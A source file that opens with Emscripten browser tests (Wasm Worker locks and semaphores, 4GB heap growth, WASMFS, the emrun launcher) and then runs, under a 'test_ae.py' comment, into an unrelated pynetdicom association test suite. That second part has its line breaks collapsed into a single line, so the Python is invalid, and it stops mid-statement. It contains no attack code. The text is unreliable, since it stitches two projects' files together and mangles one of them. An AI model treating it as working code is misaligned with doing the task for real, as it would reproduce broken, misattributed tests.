# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
  self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])

# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
  self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])

# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
  self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])

# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
  self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
  self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
  # Also runs through Closure to verify the lock API survives minification.
  self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])

# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
  self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
  self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])

# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
  self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
             args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])

# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
  self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])

# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
  self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])

@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb(self):
  # TODO Convert to an actual browser test when it reaches stable.
  # For now, keep this in browser as this suite runs serially, which
  # means we don't compete for memory with anything else (and run it
  # at the very very end, to reduce the risk of it OOM-killing the
  # browser).

  # test that we can allocate in the 2-4GB range, if we enable growth and
  # set the max appropriately
  self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
  self.do_run_in_out_file_test('browser', 'test_4GB.cpp')

# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
  self.btest(test_file('mem_growth.cpp'),
             expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
             args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])

# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
  def test(args):
    self.btest_exit(test_file('alloc_3gb.cpp'), args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)

  test(['-sMALLOC=emmalloc'])
  test(['-sMALLOC=emmalloc-debug'])
  test(['-sMALLOC=emmalloc-memvalidate'])
  test(['-sMALLOC=emmalloc-memvalidate-verbose'])

@parameterized({
  # the fetch backend works even on the main thread: we proxy to a background
  # thread and busy-wait
  'main_thread': (['-sPTHREAD_POOL_SIZE=1'],),
  # using proxy_to_pthread also works, of course
  'proxy_to_pthread': (['-sPROXY_TO_PTHREAD'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
  if is_firefox() and '-sPROXY_TO_PTHREAD' not in args:
    return self.skipTest('ff hangs on the main_thread version. browser bug?')
  create_file('data.dat', 'hello, fetch')
  self.btest_exit(test_file('wasmfs/wasmfs_fetch.c'), args=['-sWASMFS', '-sUSE_PTHREADS'] + args)

@requires_threads
@no_firefox('no OPFS support yet')
def test_wasmfs_opfs(self):
  test = test_file('wasmfs/wasmfs_opfs.c')
  args = ['-sWASMFS', '-pthread', '-sPROXY_TO_PTHREAD']
  # Run setup and resume phases as separate executions.
  self.btest_exit(test, args=args + ['-DWASMFS_SETUP'])
  self.btest_exit(test, args=args + ['-DWASMFS_RESUME'])

@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_memgrowth(self, *args):
  self.btest(test_file('browser/emmalloc_memgrowth.cpp'), expected='0', args=['-sMALLOC=emmalloc', '-sALLOW_MEMORY_GROWTH=1', '-sABORTING_MALLOC=0', '-sASSERTIONS=2', '-sMINIMAL_RUNTIME=1', '-sMAXIMUM_MEMORY=4GB'])

@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_2gb_fail(self):
  # TODO Convert to an actual browser test when it reaches stable.
  # For now, keep this in browser as this suite runs serially, which
  # means we don't compete for memory with anything else (and run it
  # at the very very end, to reduce the risk of it OOM-killing the
  # browser).

  # test that growth doesn't go beyond 2GB without the max being set for that,
  # and that we can catch an allocation failure exception for that
  self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=2GB']
  self.do_run_in_out_file_test('browser', 'test_2GB_fail.cpp')

@no_firefox('no 4GB support yet')
@require_v8
def test_zzz_zzz_4gb_fail(self):
  # TODO Convert to an actual browser test when it reaches stable.
  # For now, keep this in browser as this suite runs serially, which
  # means we don't compete for memory with anything else (and run it
  # at the very very end, to reduce the risk of it OOM-killing the
  # browser).

  # test that we properly report an allocation error that would overflow over
  # 4GB.
  self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB', '-sABORTING_MALLOC=0']
  self.do_run_in_out_file_test('browser', 'test_4GB_fail.cpp')

# Tests that Emscripten-compiled applications can be run when a slash in the URL query or fragment of the js file
def test_browser_run_with_slash_in_query_and_hash(self):
  self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O0'])
  # Fixed: use read_file() instead of open(...).read(), which leaked the
  # handle (and matches test_browser_run_from_different_directory above).
  src = read_file('test.html')
  # Slash in query
  create_file('test-query.html', src.replace('test.js', 'test.js?type=pass/fail'))
  self.run_browser('test-query.html', None, '/report_result?0')
  # Slash in fragment
  create_file('test-hash.html', src.replace('test.js', 'test.js#pass/fail'))
  self.run_browser('test-hash.html', None, '/report_result?0')
  # Slash in query and fragment
  create_file('test-query-hash.html', src.replace('test.js', 'test.js?type=pass/fail#pass/fail'))
  self.run_browser('test-query-hash.html', None, '/report_result?0')

@disabled("only run this manually, to test for race conditions")
@parameterized({
  'normal': ([],),
  'assertions': (['-sASSERTIONS'],)
})
@requires_threads
def test_manual_pthread_proxy_hammer(self, args):
  # the specific symptom of the hang that was fixed is that the test hangs
  # at some point, using 0% CPU. often that occured in 0-200 iterations, but
  # you may want to adjust "ITERATIONS".
  self.btest_exit(test_file('pthread/test_pthread_proxy_hammer.cpp'),
                  args=['-sUSE_PTHREADS', '-O2', '-sPROXY_TO_PTHREAD', '-DITERATIONS=1024', '-g1'] + args,
                  timeout=10000,
                  # don't run this with the default extra_tries value, as this is
                  # *meant* to notice something random, a race condition.
                  extra_tries=0)

def test_assert_failure(self):
  self.btest(test_file('browser/test_assert_failure.c'), 'abort:Assertion failed: false && "this is a test"')

def test_full_js_library_strict(self):
  self.btest_exit(test_file('hello_world.c'), args=['-sINCLUDE_FULL_LIBRARY', '-sSTRICT_JS'])


EMRUN = path_from_root('emrun')


class emrun(RunnerCore):
  # Tests for the standalone `emrun` launcher/test-runner tool.
  def test_emrun_info(self):
    if not has_browser():
      self.skipTest('need a browser')
    result = self.run_process([EMRUN, '--system_info', '--browser_info'], stdout=PIPE).stdout
    assert 'CPU' in result
    assert 'Browser' in result
    assert 'Traceback' not in result

    result = self.run_process([EMRUN, '--list_browsers'], stdout=PIPE).stdout
    assert 'Traceback' not in result

  def test_no_browser(self):
    # Test --no_browser mode where we have to take care of launching the browser ourselves
    # and then killing emrun when we are done.
    if not has_browser():
      self.skipTest('need a browser')
    self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
    proc = subprocess.Popen([EMRUN, '--no_browser', '.', '--port=3333'], stdout=PIPE)
    try:
      if EMTEST_BROWSER:
        print('Starting browser')
        browser_cmd = shlex.split(EMTEST_BROWSER)
        browser = subprocess.Popen(browser_cmd + ['http://localhost:3333/hello_world.html'])
        try:
          # Poll emrun's stdout until the page has reported its results.
          while True:
            stdout = proc.stdout.read()
            if b'Dumping out file' in stdout:
              break
        finally:
          print('Terminating browser')
          browser.terminate()
          browser.wait()
    finally:
      print('Terminating emrun server')
      proc.terminate()
      proc.wait()

  def test_emrun(self):
    self.run_process([EMCC, test_file('test_emrun.c'), '--emrun', '-o', 'hello_world.html'])
    if not has_browser():
      self.skipTest('need a browser')

    # We cannot run emrun from the temp directory the suite will clean up afterwards, since the
    # browser that is launched will have that directory as startup directory, and the browser will
    # not close as part of the test, pinning down the cwd on Windows and it wouldn't be possible to
    # delete it. Therefore switch away from that directory before launching.
    os.chdir(path_from_root())

    args_base = [EMRUN, '--timeout', '30', '--safe_firefox_profile',
                 '--kill_exit', '--port', '6939', '--verbose',
                 '--log_stdout', self.in_dir('stdout.txt'),
                 '--log_stderr', self.in_dir('stderr.txt')]

    # Verify that trying to pass argument to the page without the `--` separator will
    # generate an actionable error message
    err = self.expect_fail(args_base + ['--foo'])
    self.assertContained('error: unrecognized arguments: --foo', err)
    self.assertContained('remember to add `--` between arguments', err)

    if EMTEST_BROWSER is not None:
      # If EMTEST_BROWSER carried command line arguments to pass to the browser,
      # (e.g. "firefox -profile /path/to/foo") those can't be passed via emrun,
      # so strip them out.
      browser_cmd = shlex.split(EMTEST_BROWSER)
      browser_path = browser_cmd[0]
      args_base += ['--browser', browser_path]
      if len(browser_cmd) > 1:
        browser_args = browser_cmd[1:]
        if 'firefox' in browser_path and ('-profile' in browser_args or '--profile' in browser_args):
          # emrun uses its own -profile, strip it out
          parser = argparse.ArgumentParser(add_help=False) # otherwise it throws with -headless
          parser.add_argument('-profile')
          parser.add_argument('--profile')
          browser_args = parser.parse_known_args(browser_args)[1]
        if browser_args:
          args_base += ['--browser_args', ' ' + ' '.join(browser_args)]

    for args in [
        args_base,
        args_base + ['--private_browsing', '--port', '6941'],
        args_base + ['--dump_out_directory', 'other dir/multiple', '--port', '6942']
    ]:
      args += [self.in_dir('hello_world.html'), '--', '1', '2', '--3']
      print(shared.shlex_join(args))
      proc = self.run_process(args, check=False)
      self.assertEqual(proc.returncode, 100)
      dump_dir = 'other dir/multiple' if '--dump_out_directory' in args else 'dump_out'
      self.assertExists(self.in_dir(f'{dump_dir}/test.dat'))
      self.assertExists(self.in_dir(f'{dump_dir}/heap.dat'))
      self.assertExists(self.in_dir(f'{dump_dir}/nested/with space.dat'))
      stdout = read_file(self.in_dir('stdout.txt'))
      stderr = read_file(self.in_dir('stderr.txt'))
      self.assertContained('argc: 4', stdout)
      self.assertContained('argv[3]: --3', stdout)
      self.assertContained('hello, world!', stdout)
      self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
      self.assertContained('Testing char sequences: %20%21 &auml;', stdout)
      self.assertContained('hello, error stream!', stderr)
# test_ae.py
"""Tests for the ae module.""" import os import signal import threading import time import pytest from pydicom import read_file from pydicom.dataset import Dataset from pydicom.uid import UID, ImplicitVRLittleEndian from pynetdicom import ( AE, evt, debug_logger, build_context, DEFAULT_TRANSFER_SYNTAXES, StoragePresentationContexts, VerificationPresentationContexts, PYNETDICOM_IMPLEMENTATION_UID, PYNETDICOM_IMPLEMENTATION_VERSION ) from pynetdicom.presentation import build_context from pynetdicom.sop_class import RTImageStorage, VerificationSOPClass #debug_logger() TEST_DS_DIR = os.path.join(os.path.dirname(__file__), 'dicom_files') DATASET = read_file(os.path.join(TEST_DS_DIR, 'RTImageStorage.dcm')) COMP_DATASET = read_file(os.path.join(TEST_DS_DIR, 'MRImageStorage_JPG2000_Lossless.dcm')) def test_blocking_handler(): """Test binding events to the blocking AssociationServer.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') def handle_echo(event): return 0x0000 handlers = [(evt.EVT_C_ECHO, handle_echo)] thread = threading.Thread( target=ae.start_server, args=(('', 11112), ), kwargs={'evt_handlers' : handlers} ) thread.daemon = True thread.start() time.sleep(0.1) ae.shutdown() class TestStartServer(object): """Tests for AE.start_server()""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_ae_title(self): """Test the `ae_title` keyword parameter.""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.ae_title = b'TESTAET' assert ae.ae_title == b'TESTAET ' ae.add_supported_context(VerificationSOPClass) server = ae.start_server(('', 11112), block=False) assert server.ae_title == ae.ae_title server.shutdown() server = ae.start_server(('', 11112), block=False, ae_title=b'MYAE') assert server.ae_title == b'MYAE ' ae.require_called_aet = True ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('', 11112, 
ae_title=b'MYAE') assert assoc.is_established assoc.release() assert assoc.is_released server.shutdown() def test_contexts(self): """Test the `contexts` keyword parameter.""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.ae_title = b'TESTAET' assert ae.ae_title == b'TESTAET ' cx = build_context(VerificationSOPClass) server = ae.start_server(('', 11112), block=False, contexts=[cx]) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('', 11112, ae_title=b'MYAE') assert assoc.is_established assert assoc.accepted_contexts[0].abstract_syntax == VerificationSOPClass assoc.release() assert assoc.is_released server.shutdown() class TestAEVerificationSCP(object): """Check verification SCP""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_start_server_keyboard_interrupt(self): """Test stopping the SCP with keyboard""" pid = os.getpid() def trigger_signal(): time.sleep(0.1) os.kill(pid, signal.SIGINT) self.ae = ae = AE() ae.add_supported_context('1.2.3') thread = threading.Thread(target=trigger_signal) thread.daemon = True thread.start() ae.start_server(('', 11112)) ae.shutdown() def test_no_supported_contexts(self): """Test starting with no contexts raises""" ae = AE() with pytest.raises(ValueError, match=r"No supported Presentation"): ae.start_server(('', 11112)) def test_new_scu_scp_warning(self, caplog): """Test that a warning is given if scu_role and scp_role bad.""" ae = AE() ae.add_supported_context('1.2.3.4', scp_role=False) msg = r"The following presentation contexts have " with pytest.raises(ValueError, match=msg): ae.start_server(('', 11112)) def test_str_empty(self): """Test str output for default AE""" ae = AE() ae.__str__() class TestAEPresentationSCU(object): """Tests for AE presentation contexts when running as an SCU""" def setup(self): """Run prior to each test""" self.ae = None def teardown(self): 
"""Clear any active threads""" if self.ae: self.ae.shutdown() def test_associate_context(self): """Test that AE.associate doesn't modify the supplied contexts""" # Test AE.requested_contexts self.ae = ae = AE() ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.requested_contexts = VerificationPresentationContexts ae.acse_timeout = 5 ae.dimse_timeout = 5 assoc = ae.associate('localhost', 11112) assert assoc.is_established assert ae.requested_contexts[0].context_id is None assert len(assoc.requestor.requested_contexts) == 1 assert assoc.requestor.requested_contexts[0].abstract_syntax == ( '1.2.840.10008.1.1' ) assert assoc.requestor.requested_contexts[0].context_id == 1 assoc.release() assert not assoc.is_established assert assoc.is_released # Test associate(contexts=...) ae.requested_contexts = [] assoc = ae.associate('localhost', 11112, contexts=VerificationPresentationContexts) assert assoc.is_established assert VerificationPresentationContexts[0].context_id is None assert len(assoc.requestor.requested_contexts) == 1 assert assoc.requestor.requested_contexts[0].abstract_syntax == ( '1.2.840.10008.1.1' ) assert assoc.requestor.requested_contexts[0].context_id == 1 assoc.release() assert not assoc.is_established assert assoc.is_released scp.shutdown() def test_associate_context_raises(self): """Test that AE.associate raises exception if no requested contexts""" self.ae = ae = AE() with pytest.raises(RuntimeError): assoc = ae.associate('localhost', 11112) class TestAEGoodTimeoutSetters(object): def test_acse_timeout(self): """ Check AE ACSE timeout change produces good value """ ae = AE() assert ae.acse_timeout == 30 ae.acse_timeout = None assert ae.acse_timeout is None ae.acse_timeout = -100 assert ae.acse_timeout == 30 ae.acse_timeout = 'a' assert ae.acse_timeout == 30 ae.acse_timeout = 0 assert ae.acse_timeout == 0 ae.acse_timeout = 30 assert ae.acse_timeout == 30 def test_dimse_timeout(self): """ Check AE DIMSE 
timeout change produces good value """ ae = AE() assert ae.dimse_timeout is 30 ae.dimse_timeout = None assert ae.dimse_timeout is None ae.dimse_timeout = -100 assert ae.dimse_timeout is 30 ae.dimse_timeout = 'a' assert ae.dimse_timeout is 30 ae.dimse_timeout = 0 assert ae.dimse_timeout == 0 ae.dimse_timeout = 30 assert ae.dimse_timeout == 30 def test_network_timeout(self): """ Check AE network timeout change produces good value """ ae = AE() assert ae.network_timeout == 60 ae.network_timeout = None assert ae.network_timeout is None ae.network_timeout = -100 assert ae.network_timeout == 60 ae.network_timeout = 'a' assert ae.network_timeout == 60 ae.network_timeout = 0 assert ae.network_timeout == 0 ae.network_timeout = 30 assert ae.network_timeout == 30 def test_active_acse(self): """Test changing acse_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.acse_timeout == 30 ae.acse_timeout = 5 assert assoc.acse_timeout == 5 assoc.release() scp.shutdown() ae.shutdown() def test_active_dimse(self): """Test changing dimse_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.dimse_timeout == 30 ae.dimse_timeout = 5 assert assoc.dimse_timeout == 5 assoc.release() scp.shutdown() def test_active_network(self): """Test changing network_timeout with active associations.""" ae = AE() ae.add_supported_context('1.2.840.10008.1.1') scp = ae.start_server(('', 11112), block=False) ae.add_requested_context('1.2.840.10008.1.1') assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.network_timeout == 60 ae.network_timeout = 5 assert 
assoc.network_timeout == 5 assoc.release() scp.shutdown() class TestAEGoodAssociation(object): def setup(self): """Run prior to each test""" self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_associate_establish_release(self): """ Check SCU Association with SCP """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert not assoc.is_established assert assoc.is_released scp.shutdown() def test_associate_max_pdu(self): """ Check Association has correct max PDUs on either end """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.maximum_pdu_size = 54321 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) scu_ae = AE() scu_ae.acse_timeout = 5 scu_ae.dimse_timeout = 5 scu_ae.network_timeout = 5 scu_ae.add_requested_context(VerificationSOPClass) assoc = scu_ae.associate('localhost', 11112, max_pdu=12345) assert assoc.is_established assert scp.active_associations[0].acceptor.maximum_length == ( 54321 ) assert scp.active_associations[0].requestor.maximum_length == ( 12345 ) assert assoc.requestor.maximum_length == 12345 assert assoc.acceptor.maximum_length == 54321 assoc.release() # Check 0 max pdu value - max PDU value maps to 0x10000 internally assoc = scu_ae.associate('localhost', 11112, max_pdu=0) assert assoc.requestor.maximum_length == 0 assert scp.active_associations[0].requestor.maximum_length == 0 assoc.release() scp.shutdown() def test_association_timeouts(self): """ Check that the Association timeouts are being set correctly and work """ DELAY = [] def handle(event): if DELAY: time.sleep(DELAY[0]) return 0x0000 self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 
ae.network_timeout = 0.5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server( ('', 11112), block=False, evt_handlers=[(evt.EVT_C_ECHO, handle)] ) scu_ae = AE() scu_ae.acse_timeout = 30 scu_ae.dimse_timeout = 30 scu_ae.network_timeout = 30 scu_ae.add_requested_context(VerificationSOPClass) assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established # Hit the network timeout time.sleep(1.0) assert assoc.is_aborted assert len(scp.active_associations) == 0 ae.acse_timeout = None ae.dimse_timeout = None ae.network_timeout = None scu_ae.acse_timeout = 30 scu_ae.dimse_timeout = 0 DELAY.append(1) assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established status = assoc.send_c_echo() time.sleep(1.5) assert assoc.is_aborted assert len(scp.active_associations) == 0 scu_ae.acse_timeout = 0 scu_ae.dimse_timeout = 30 assoc = scu_ae.associate('localhost', 11112) assert not assoc.is_established assert len(scp.active_associations) == 0 ae.acse_timeout = 21 ae.dimse_timeout = 22 scu_ae.acse_timeout = 31 scu_ae.dimse_timeout = 32 assoc = scu_ae.associate('localhost', 11112) assert assoc.is_established assert scp.active_associations[0].acse_timeout == 21 assert scp.active_associations[0].dimse_timeout == 22 assert assoc.acse_timeout == 31 assert assoc.dimse_timeout == 32 assoc.release() scp.shutdown() def test_select_timeout_okay(self): """Test that using start works OK with timeout.""" # Multiple release/association in a sort time causes an OSError as # the port is still in use due to the use of select.select() with # a timeout. 
Fixed by using socket.shutdown in stop() for ii in range(3): self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established scp.shutdown() class TestAEBadAssociation(object): def test_raise(self): """Test bad associate call""" ae = AE() ae.add_requested_context(VerificationSOPClass) with pytest.raises(TypeError): ae.associate(1112, 11112) with pytest.raises(TypeError): ae.associate('localhost', '1.2.3.4') class TestAEGoodMiscSetters(object): def setup(self): self.ae = None def teardown(self): if self.ae: self.ae.shutdown() def test_ae_title_good(self): """ Check AE title change produces good value """ ae = AE() ae.ae_title = ' TEST ' assert ae.ae_title == b'TEST ' ae.ae_title = ' TEST' assert ae.ae_title == b'TEST ' ae.ae_title = ' TEST' assert ae.ae_title == b'TEST ' ae.ae_title = 'a TEST' assert ae.ae_title == b'a TES' ae.ae_title = 'a TEST' assert ae.ae_title == b'a TEST ' def test_max_assoc_good(self): """ Check AE maximum association change produces good value """ ae = AE() ae.maximum_associations = -10 assert ae.maximum_associations == 1 ae.maximum_associations = ['a'] assert ae.maximum_associations == 1 ae.maximum_associations = '10' assert ae.maximum_associations == 1 ae.maximum_associations = 0 assert ae.maximum_associations == 1 ae.maximum_associations = 5 assert ae.maximum_associations == 5 def test_max_pdu_good(self): """ Check AE maximum pdu size change produces good value """ ae = AE() ae.maximum_pdu_size = -10 assert ae.maximum_pdu_size == 16382 ae.maximum_pdu_size = 0 assert ae.maximum_pdu_size == 0 ae.maximum_pdu_size = 5000 assert ae.maximum_pdu_size == 5000 def test_require_calling_aet(self): """Test AE.require_calling_aet""" self.ae = ae = AE() 
ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established ae.require_calling_aet = [b'MYAE'] assert ae.require_calling_aet == [b'MYAE '] assoc = ae.associate('localhost', 11112) assert assoc.is_rejected ae.require_calling_aet = [b'PYNETDICOM '] assert ae.require_calling_aet == [b'PYNETDICOM '] assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() with pytest.raises(ValueError, match=r"entirely of only spaces"): ae.require_calling_aet = [b''] assert ae.require_calling_aet == [b'PYNETDICOM '] assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() scp.shutdown() def test_require_called_aet(self): """Test AE.require_called_aet""" self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert assoc.is_released assert not assoc.is_established ae.require_called_aet = True assert ae.require_called_aet is True assoc = ae.associate('localhost', 11112) assert assoc.is_rejected assoc = ae.associate('localhost', 11112, ae_title=b'PYNETDICOM') assert assoc.is_established assoc.release() scp.shutdown() def test_req_calling_aet(self): """ Check AE require calling aet change produces good value """ ae = AE() ae.require_calling_aet = [b'10', b'asdf'] assert ae.require_calling_aet == [ b'10 ', b'asdf ' ] def test_req_called_aet(self): """ Check AE require called aet change produces good value """ ae = AE() assert ae.require_called_aet is False ae.require_called_aet = True assert 
ae.require_called_aet is True ae.require_called_aet = False assert ae.require_called_aet is False def test_string_output(self): """Test string output""" ae = AE() ae.add_requested_context(VerificationSOPClass) ae.require_calling_aet = [b'something'] ae.require_called_aet = True assert 'Explicit VR' in ae.__str__() assert 'Verification' in ae.__str__() assert '0/10' in ae.__str__() assert 'something' in ae.__str__() assert 'Require called AE title: True' in ae.__str__() ae.supported_contexts = StoragePresentationContexts assert 'CT Image' in ae.__str__() ae = AE() ae.add_requested_context(VerificationSOPClass) assert 'None' in ae.__str__() self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) assoc = ae.associate('localhost', 11112) assert assoc.is_established assert assoc.is_established assert 'Explicit VR' in ae.__str__() assert 'Peer' in ae.__str__() assoc.release() assert assoc.is_released assert not assoc.is_established scp.shutdown() def test_init_implementation_class(self): """Test the default implementation class uid""" ae = AE() assert ae.implementation_class_uid == PYNETDICOM_IMPLEMENTATION_UID def test_init_implementation_version(self): """Test the default implementation version name""" ae = AE() assert ae.implementation_version_name == PYNETDICOM_IMPLEMENTATION_VERSION class TestAEBadInitialisation(object): def test_ae_title_all_spaces(self): """AE should fail if ae_title is all spaces""" with pytest.raises(ValueError): AE(ae_title=b' ') def test_ae_title_empty_str(self): """AE should fail if ae_title is an empty str""" with pytest.raises(ValueError): AE(ae_title=b'') def test_ae_title_invalid_chars(self): """ AE should fail if ae_title is not a str """ with pytest.raises(ValueError): AE(ae_title=b'TEST\ME') class TestAE_GoodExit(object): def setup(self): """Run prior to each test""" 
self.ae = None def teardown(self): """Clear any active threads""" if self.ae: self.ae.shutdown() def test_ae_release_assoc(self): """ Association releases OK """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) # Test N associate/release cycles for ii in range(5): assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.release() assert not assoc.is_established assert not assoc.is_aborted assert assoc.is_released assert not assoc.is_rejected scp.shutdown() def test_ae_aborts_assoc(self): """ Association aborts OK """ self.ae = ae = AE() ae.acse_timeout = 5 ae.dimse_timeout = 5 ae.network_timeout = 5 ae.add_supported_context(VerificationSOPClass) scp = ae.start_server(('', 11112), block=False) ae.add_requested_context(VerificationSOPClass) # Test N associate/abort cycles for ii in range(5): assoc = ae.associate('localhost', 11112) assert assoc.is_established assoc.abort() assert not assoc.is_established assert assoc.is_aborted assert not assoc.is_released assert not assoc.is_rejected scp.shutdown() class TestAESupportedPresentationContexts(object): """Tests for AE's presentation contexts when acting as an SCP""" def setup(self): self.ae = AE() def test_add_supported_context_str(self): """Tests for AE.add_supported_context using str.""" self.ae.add_supported_context('1.2.840.10008.1.1') context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.1.1' assert context.transfer_syntax == DEFAULT_TRANSFER_SYNTAXES assert context.context_id is None def test_add_supported_context_sop_class(self): """Tests for AE.add_supported_context using SOPClass.""" self.ae.add_supported_context(RTImageStorage) context = self.ae.supported_contexts[0] assert context.abstract_syntax == '1.2.840.10008.5.1.4.1.1.481.1' assert context.transfer_syntax == 
